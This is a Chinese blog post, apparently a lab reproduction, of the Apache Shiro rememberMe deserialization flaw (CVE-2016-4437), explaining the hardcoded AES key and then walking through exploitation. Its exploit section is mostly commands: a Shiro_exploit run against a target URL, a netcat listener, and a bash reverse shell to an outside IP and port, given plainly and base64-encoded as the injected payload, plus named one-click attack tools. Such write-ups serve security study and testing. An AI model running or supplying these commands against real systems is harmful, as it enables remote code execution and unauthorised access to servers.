码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • 【漏洞复现】shiro 反序列化 (CVE-2016-4437)


    漏洞介绍

    Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。使用Shiro易于理解的API,开发者可以快速、轻松地获得任何应用程序,从最小的移动应用程序到最大的网络和企业应用程序

    在Shiro <= 1.2.4中,反序列化过程中所用到的AES加密的key是硬编码在源码中,当用户勾选RememberMe并登录成功,Shiro会将用户的cookie值序列化,AES加密,接着base64编码后存储在cookie的rememberMe字段中,服务端收到登录请求后,会对rememberMe的cookie值进行base64解码,接着进行AES解密,然后反序列化。由于AES加密是对称式加密(key既能加密数据也能解密数据),所以当攻击者知道了AES key后,就能够构造恶意的rememberMe cookie值从而触发反序列化漏洞

    poc

    使用burp抓取当前页面数据包,在cookie中添加rememberMe=1,在响应包中显示两个Set-Cookie: rememberMe=deleteMe,说明存在shiro框架可能存在漏洞
    在这里插入图片描述

    exp

    我的vm虚拟机 kali IP: 192.168.100.131

    我的花生壳 映射外网地址 103.46.128.21:49040-> 192.168.100.131:8888
    在这里插入图片描述

    使用Shiro_exploit进行漏洞利用

    项目地址:https://github.com/insightglacier/Shiro_exploit

    检测是否存在shiro漏洞

    python .\shiro_exploit.py -u http://123.58.224.8:25050/
    
    • 1

    在这里插入图片描述
    vulnerable:True表示存在shiro漏洞

    在这里插入图片描述

    反弹shell利用

    • kali 监听
     nc -lnvp 8888
    
    • 1

    在这里插入图片描述

    • 执行利用脚本
    python shiro_exploit.py -t 3 -u  http://123.58.224.8:25050/  -p "bash加密命令"
    # bash命令
    bash -i >& /dev/tcp/103.46.128.21/49040 0>&1
    # bash加密后命令
    bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDMuNDYuMTI4LjIxLzQ5MDQwIDA+JjE=}|{base64,-d}|{bash,-i}
    
    • 1
    • 2
    • 3
    • 4
    • 5
    python shiro_exploit.py -t 3 -u   http://123.58.224.8:25050/  -p "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDMuNDYuMTI4LjIxLzQ5MDQwIDA+JjE=}|{base64,-d}|{bash,-i}"
    
    • 1

    在这里插入图片描述
    成功反弹shell
    在这里插入图片描述

    使用一键利用工具复现

    项目地址:https://github.com/j1anFen/shiro_attack/releases/tag/2.2

    在这里插入图片描述

    在这里插入图片描述

    扫描工具

    都是能够识别出shiro

    afrog

    在这里插入图片描述

    Yakit

    在这里插入图片描述

  • 相关阅读:
    西南科技大学模拟电子技术实验四(集成运算放大器的线性应用)预习报告
    初级程序员如何进阶
    用户体验与响应式字体二三事|rem单位与flexible.js、rpx单位与css媒体查询
    Java项目:ssm企业人事管理系统
    2023高教社杯数学建模国赛的工具箱准备
    终于搞懂动态代理了!
    计算机视觉图像处理面试笔试题整理——图像配准和图像拼接
    【Linux学习】01Linux初识与安装
    Hardhat开发智能合约和DApp
    vue使用pinia存储数据并保持数据持久化
  • 原文地址:https://blog.csdn.net/qq_52549196/article/details/126329680
  • 最新文章
  • 沪漂五周年了:我越来越迷茫了
    Agentic Skill Routing 实战:别再把所有 Skill 塞进 AI Agent 上下文
    MySQL-Seconds_behind_master的精度误差
    [MAF预定义ChatClient中间件-03]CachingChatClient——利用缓存省钱省时间
    AI的至暗历史:从万众期待到被政府撤资,AI的两次死亡徘徊
    Agent OS :五种驯服不确定性的范式
    PortSwigger SQL注入LAB11
    数据库即时编译JIT
    [Begin]AI Learn Data Day 0
    深度学习进阶(二十七)现代 LLM 的核心架构设计其二:SwiGLU
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
小工具 小游戏
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1

京公网安备 11010502049817号